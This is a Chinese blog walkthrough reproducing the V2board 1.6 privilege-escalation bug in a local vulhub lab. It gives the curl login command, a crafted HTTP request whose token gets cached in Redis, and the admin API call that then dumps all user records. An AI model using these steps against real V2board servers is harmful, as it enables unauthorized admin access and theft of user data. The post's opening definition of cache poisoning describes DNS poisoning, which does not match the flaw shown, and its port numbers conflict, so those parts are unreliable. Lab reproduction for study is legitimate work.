V2board缓存投毒漏洞复现

最新推荐文章于 2024-06-12 09:30:54 发布
最新推荐文章于 2024-06-12 09:30:54 发布
阅读量1.5k 收藏
点赞数 1
文章标签: 缓存 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57094995/article/details/132353692
版权

1.什么是缓存投毒

缓存投毒(Cache poisoning),通常也称为域名系统投毒(domain name system poisoning),或DNS缓存投毒(DNS cache poisoning)。它是利用虚假Internet地址替换掉域名系统表中的地址,进而制造破坏。当网络用户在带有该虚假地址的页面中进行搜寻,以访问某链接时,网页浏览器由于受到该虚假条目的影响而打开了不同的网页链接。在这种情况下,蠕虫、木马、浏览器劫持等恶意软件就可能会被下载到本地用户的电脑上。

                                                                                                                                                        ------百度

 关于v2board的相关漏洞信息和文件在此链接https://github.com/vulhub/vulhub/tree/master/v2board/1.6-privilege-escalation

2.复现漏洞

1.首先 建立一个目录,复制以下两个脚本文件

 

2. 建立完成后,利用docker创建复现环境

docker compose up -d

下载完成后输入IP地址加端口号即可看见登录界面

 

3.自行注册一个账号

然后,将电子邮件和密码替换为您自己的数据并登录:

curl -i -s -k -XPOST --data-binary "email=123@123.com&password=12345678"http://localhost:9090/api/v1/passport/auth/login

得到如下auth_data码

 4.打开bp抓包,将带有auth_data码的request包放入其中

GET /api/v1/user/info HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E=
Cache-Control: max-age=0

即可得出该用户的信息

此步骤是让服务器将您的授权保存到 Redis 缓存。

最后,可以简单地使用此授权调用所有管理员 API,例如 http://your-ip:8080/api/v1/admin/user/fetch

我们利用管理员的api将所有用户信息一一列出,漏洞复现大功告成!!!

 

清风伴华裳
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
v3board-user:v2board用户前端
04-16
蚂蚁设计专业版 该项目已使用初始化。 遵循是如何使用的快速指南。 环境准备 安装node_modules : npm install 或者 yarn 提供的脚本 Ant Design Pro提供了一些有用的脚本,可帮助您快速启动和构建Web项目,代码样式检查和测试。 package.json提供的脚本。 修改或添加其他脚本是安全的: 开始项目 npm start 建立项目 npm run build 检查代码样式 npm run lint 您还可以使用脚本自动修复某些皮棉错误: npm run lint:fix 测试码 npm test 更多的 您可以在我们的上查看完整文档。 并欢迎在我们的任何反馈。
github_v2board_v2board
02-17
V2板 PHP7.3 + 作曲家 MySQL5.5 + 雷迪斯 Laravel 演示版 文档 捐款 ETH&(USDT-ERC20):0x84F85A89105B93F74c3b5db6410Ee8630F01063f 赞助商 感谢提供的开源项目许可证 其他 电报频道:
推荐开源项目:V2Board-theme-LuFly - 优雅的V2Board主题皮肤
gitblog_00020的博客
06-01 591
推荐开源项目:V2Board-theme-LuFly - 优雅的V2Board主题皮肤 项目地址:https://gitcode.com/GZ1903/v2board-theme-LuFly 1、项目介绍 在开放源代码的世界里,个性化的界面设计总能给用户体验带来新的惊喜。V2Board-theme-LuFly 是一款针对V2Board精心打造的主题,它以简洁而不失高雅的设计风格,为您的V2Boar...
V2board 1.6.1 提权漏洞(web缓存投毒)
m0_63069714的博客
06-01 1259
前端的认证方式后端并没有进行区分,导致前端认证方式和后端认证方式被同一个健全接口所利用,而这个健全接口没有去区分到底是普通用户还是管理员,从而产生了此漏洞。用户自己注册一个账户,通过访问如下这样一个curl来进行获取我们的认证信息(其中邮箱和密码是自己注册时的邮箱和密码)通过burpsuite进行抓包,修改Request请求包中的内容。在gethub中直接拉去docker镜像。拷贝这个认证信息,并替换到如下数据包中。
缓存投毒的学习总结
bylfsj的博客
05-08 1176
<p></p><p><strong>引言:</strong></p> 缓存投毒,听起来就是寻找和利用都很困难的一类漏洞利用。但在了解了原理以及实际体验过之后,你会发现,过程很神奇,结果很美好~ 这篇文章算是对缓存投毒的一个小总结,以便后面的复习。内容浅尝即止,师傅们轻喷。 文章一共分为以下几个部分: 什么是缓存投毒缓存投毒的发现与利用 通过几个实验例子来实践缓存投毒 使用缓存投毒来解CTF题 ...
探索 V2Board:打造您的专属云服务管理平台
最新发布
gitblog_00079的博客
06-12 388
???? 探索 V2Board:打造您的专属云服务管理平台 项目地址:https://gitcode.com/wyx2685/v2board ???? 项目介绍 在数字化转型的时代背景下,云服务管理变得尤为重要。今天,我将为您揭开一个名为V2Board的强大开源项目的面纱,它不仅简化了云服务提供商的工作流程,还提供了高效的用户管理和系统监控功能。V2Board基于PHP7.3+和Laravel框架构建,并巧妙...
v2board 主题-Sleek.zip
04-03
【标题】"v2board 主题-Sleek.zip" 是一个专门为 v2board 设计的主题压缩包,Sleek 指的是该主题所采用的简洁、现代化的设计风格。v2board 是一款基于 Vue.js 开发的论坛软件,它允许用户创建和管理自己的社区论坛,...
C-V2X边缘缓存中文件请求预测机制
05-06
在基于蜂窝通信演进形成的车用无线通信技术(Cellular-Vehicle to everything, C-V2X)场景下, 基站作为多接入边缘计算(Multi-access Edge Computing, MEC)边缘缓存节点可提高用户获取数据的效率, 但其缓存容量有限....
personal_board_v2
03-31
PersonalBoardV2 要启动Phoenix服务器: 使用mix deps.get安装依赖mix deps.get 使用mix ecto.setup创建和迁移数据库 使用npm install在assets目录中安装Node.js依赖项 使用mix phx.server启动Phoenix端点 ...
安全基础第十二天:nginx相关配置和nginx-host绕过
weixin_62870380的博客
05-15 1138
nginx的动静分离,nginx的缓存,以及缓存投毒漏洞复现,docker-compose在centos下存在的问题。
探索V2BoardBot:一个智能社区管理解决方案
gitblog_00013的博客
04-05 279
探索V2BoardBot:一个智能社区管理解决方案 项目地址:https://gitcode.com/v2boardbot/v2boardbot V2BoardBot 是一个基于GitHub的开源项目,设计用于自动化论坛和社区的管理工作。它的核心是利用人工智能和自然语言处理技术,帮助管理员更高效、准确地维护社区秩序,同时减轻日常繁琐的任务负担。 技术分析 自然语言处理(NLP): V2Boar...
复现B-漏洞复现
qq_51926773的博客
11-28 4323
一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 D.
docker里运行病毒会对系统造成影响吗?
m0_57236802的博客
05-18 552
Docker 容器提供了一定程度的隔离,但它不如虚拟机(如 VirtualBox 或 VMWare)提供的隔离强大。而 Docker 容器共享主机的操作系统内核,虽然有很多隔离措施,但如果内核存在漏洞,或者 Docker 配置不当,有可能被恶意软件利用来逃逸到宿主机。总的来说,虽然 Docker 可以提供一定程度的隔离,但它并没有设计成一个安全沙箱,用来隔离恶意软件。因此,从安全角度来看,如果你打算在 Docker 容器中运行病毒或恶意软件进行测试,你应该十分小心,并采取额外的安全措施。
云安全CVE漏洞复现-CVE-2019-5736 Docker逃逸
m0_75152875的博客
12-04 300
1.解释docker逃逸和镜像投毒 2.熟练掌握云安全CVE漏洞复现-CVE-2019-5736 Docker逃逸 3.详细介绍POC、EXP、Payload与Shellcode
Docker 学习笔记 - 安装、运行、卸载
灵台方寸山斜月三星洞
09-15 127
Docker 学习笔记基础概念/名词解释安装启动 Docker 服务Docker 常用命令卸载参考资料 基础概念/名词解释 名词 说明 image镜像 docker封装好的一个模板,里面是一个可运行的服务,以及运行此服务所需要的依赖环境。 container容器 镜像运行起来后就成为一个容器。干活的都在容器里。(有点类与实例的意思) 安装 我的系统是 CentOS7 账号使用的 root 设置docker仓库的yum-config-manager命令包含在yum-utils所以要先
hgame2023-week2
247533的博客
01-20 1058
hgame week2
docker 恶意镜像到容器逃逸影响本机
weixin_30549175的博客
04-24 525
转载:http://521.li/post/122.html SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。 漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响...
fastjson1.2.24漏洞复现
07-27
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞,建议升级到最新版本1.2.83safeMode加固,或者升级至Fastjson v2。\[3\]因此,如果你想复现Fastjson 1.2.24版本的漏洞,我建议你不要这样做,而是采取相应的安全措施来保护你的系统。 #### 引用[.reference_title] - *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)](https://blog.csdn.net/oiadkt/article/details/130103907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值